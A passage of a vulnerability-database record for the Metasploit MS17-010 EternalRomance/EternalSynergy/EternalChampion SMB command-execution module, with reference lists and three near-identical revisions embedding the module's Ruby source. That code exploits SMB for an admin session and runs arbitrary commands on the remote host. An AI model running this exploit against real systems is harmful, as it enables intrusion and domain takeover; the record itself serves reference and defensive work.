"ICSMA-18-058-02"], "type": "ics"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, 
{"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-07-01T18:01:27", "rev": 2, "value": 7.2, "vector": "NONE"}}, "hash": "95ab11c1ba313720bd278e95f96a3e6f", 
"history": [], "href": "", "id": "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "lastseen": "2020-07-01T18:01:27", "metasploitHistory": "", "metasploitReliability": "", "modified": "1976-01-01T00:00:00", "objectVersion": "1.4", "published": "1976-01-01T00:00:00", "references": ["https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. 
This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n\n 'Author' => [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n\n 'License' => MSF_LICENSE,\n 'References' => [\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'DisclosureDate' => 'Mar 14 2017',\n 'Notes' =>\n {\n 'AKA' => [\n 'ETERNALSYNERGY',\n 'ETERNALROMANCE',\n 'ETERNALCHAMPION',\n 'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred\n ]\n }\n ))\n\n register_options([\n OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),\n OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group \"Domain Admins\" /domain']),\n OptPort.new('RPORT', [true, 'The Target port', 445]),\n OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),\n ])\n\n register_advanced_options([\n OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files','']),\n OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),\n OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0]),\n ])\n end\n\n def run_host(ip)\n begin\n if datastore['SMBUser'].present?\n print_status(\"Authenticating to #{ip} as user '#{splitname(datastore['SMBUser'])}'...\")\n end\n eternal_pwn(ip) # exploit Admin session\n smb_pwn(ip) # psexec\n\n rescue 
::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn(ip)\n text = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.txt\"\n bat = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.bat\"\n @smbshare = datastore['SMBSHARE']\n @ip = ip\n\n # Try and authenticate with given credentials\n output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])\n\n # Report output\n print_good(\"Command completed successfully!\")\n print_status(\"Output for \\\"#{datastore['COMMAND']}\\\":\\n\")\n print_line(\"#{output}\\n\")\n report_note(\n :rhost => datastore['RHOSTS'],\n :rport => datastore['RPORT'],\n :type => \"psexec_command\",\n :name => datastore['COMMAND'],\n :data => output\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/smb/ms17_010_command.rb", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution", "type": "metasploit", "viewCount": 364}, "differentElements": ["published", "modified"], "edition": 185, "lastseen": "2020-07-01T18:01:27"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. 
This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "enchantments": {"dependencies": {"modified": "2019-08-14T05:45:32", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": 
"threatpost"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"modified": "2019-08-14T05:45:32", "value": 7.2, "vector": "NONE"}}, "hash": "032f89b8b6efb729d4cc700fbcf6660e", "history": [], "href": "", "id": "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "lastseen": "2019-08-14T05:45:32", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-05-23T01:05:44", "objectVersion": "1.4", "published": "2018-01-29T01:13:25", "references": 
["https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. 
This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n\n 'Author' => [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n\n 'License' => MSF_LICENSE,\n 'References' => [\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'DisclosureDate' => 'Mar 14 2017',\n 'Notes' =>\n {\n 'AKA' => [\n 'ETERNALSYNERGY',\n 'ETERNALROMANCE',\n 'ETERNALCHAMPION',\n 'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred\n ]\n }\n ))\n\n register_options([\n OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),\n OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group \"Domain Admins\" /domain']),\n OptString.new('RPORT', [true, 'The Target port', 445]),\n OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),\n ])\n\n register_advanced_options([\n OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files','']),\n OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),\n OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0]),\n ])\n end\n\n def run_host(ip)\n begin\n if datastore['SMBUser'].present?\n print_status(\"Authenticating to #{ip} as user '#{splitname(datastore['SMBUser'])}'...\")\n end\n eternal_pwn(ip) # exploit Admin session\n smb_pwn(ip) # psexec\n\n rescue 
::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn(ip)\n text = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.txt\"\n bat = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.bat\"\n @smbshare = datastore['SMBSHARE']\n @ip = ip\n\n # Try and authenticate with given credentials\n output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])\n\n # Report output\n print_good(\"Command completed successfully!\")\n print_status(\"Output for \\\"#{datastore['COMMAND']}\\\":\\n\")\n print_line(\"#{output}\\n\")\n report_note(\n :rhost => datastore['RHOSTS'],\n :rport => datastore['RPORT'],\n :type => \"psexec_command\",\n :name => datastore['COMMAND'],\n :data => output\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/smb/ms17_010_command.rb", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution", "type": "metasploit", "viewCount": 246}, "differentElements": ["cvss", "references", "description", "cvelist", "published", "modified", "sourceHref", "sourceData", "title"], "edition": 90, "lastseen": "2019-08-14T05:45:32"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module will exploit SMB with 
vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "enchantments": {"dependencies": {"modified": "2020-02-14T04:22:35", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": 
"talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-02-14T04:22:35", "value": 7.2, "vector": "NONE"}}, "hash": 
"032f89b8b6efb729d4cc700fbcf6660e", "history": [], "href": "", "id": "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "lastseen": "2020-02-14T04:22:35", "metasploitHistory": "", "metasploitReliability": "", "modified": "2019-05-23T01:05:44", "objectVersion": "1.4", "published": "2018-01-29T01:13:25", "references": ["https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010\n include Msf::Exploit::Remote::SMB::Client::Psexec\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution',\n 'Description' => %q{\n This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where\n primitive. This will then be used to overwrite the connection session information with as an\n Administrator session. From there, the normal psexec command execution is done.\n\n Exploits a type confusion between Transaction and WriteAndX requests and a race condition in\n Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy\n exploits. 
This exploit chain is more reliable than the EternalBlue exploit, but requires a\n named pipe.\n },\n\n 'Author' => [\n 'sleepya', # zzz_exploit idea and offsets\n 'zerosum0x0',\n 'Shadow Brokers',\n 'Equation Group'\n ],\n\n 'License' => MSF_LICENSE,\n 'References' => [\n [ 'MSB', 'MS17-010' ],\n [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests\n [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests\n [ 'CVE', '2017-0147'], # for EternalRomance reference\n [ 'URL', 'https://github.com/worawit/MS17-010' ],\n [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],\n [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],\n ],\n 'DisclosureDate' => 'Mar 14 2017',\n 'Notes' =>\n {\n 'AKA' => [\n 'ETERNALSYNERGY',\n 'ETERNALROMANCE',\n 'ETERNALCHAMPION',\n 'ETERNALBLUE' # does not use any CVE from Blue, but Search should show this, it is preferred\n ]\n }\n ))\n\n register_options([\n OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),\n OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group \"Domain Admins\" /domain']),\n OptString.new('RPORT', [true, 'The Target port', 445]),\n OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),\n ])\n\n register_advanced_options([\n OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files','']),\n OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),\n OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0]),\n ])\n end\n\n def run_host(ip)\n begin\n if datastore['SMBUser'].present?\n print_status(\"Authenticating to #{ip} as user '#{splitname(datastore['SMBUser'])}'...\")\n end\n eternal_pwn(ip) # exploit Admin session\n smb_pwn(ip) # psexec\n\n rescue 
::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\n print_error(\"#{e.message}\")\n rescue ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::Proto::SMB::Exceptions::LoginError,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused => e\n print_error(\"#{e.class}: #{e.message}\")\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n ensure\n eternal_cleanup() # restore session\n end\n end\n\n def smb_pwn(ip)\n text = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.txt\"\n bat = \"\\\\#{datastore['WINPATH']}\\\\Temp\\\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.bat\"\n @smbshare = datastore['SMBSHARE']\n @ip = ip\n\n # Try and authenticate with given credentials\n output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, datastore['RETRY'], datastore['DELAY'])\n\n # Report output\n print_good(\"Command completed successfully!\")\n print_status(\"Output for \\\"#{datastore['COMMAND']}\\\":\\n\")\n print_line(\"#{output}\\n\")\n report_note(\n :rhost => datastore['RHOSTS'],\n :rport => datastore['RPORT'],\n :type => \"psexec_command\",\n :name => datastore['COMMAND'],\n :data => output\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/smb/ms17_010_command.rb", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution", "type": "metasploit", "viewCount": 264}, "differentElements": ["published", "modified"], "edition": 126, "lastseen": "2020-02-14T04:22:35"}], "viewCount": 481, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0146", 
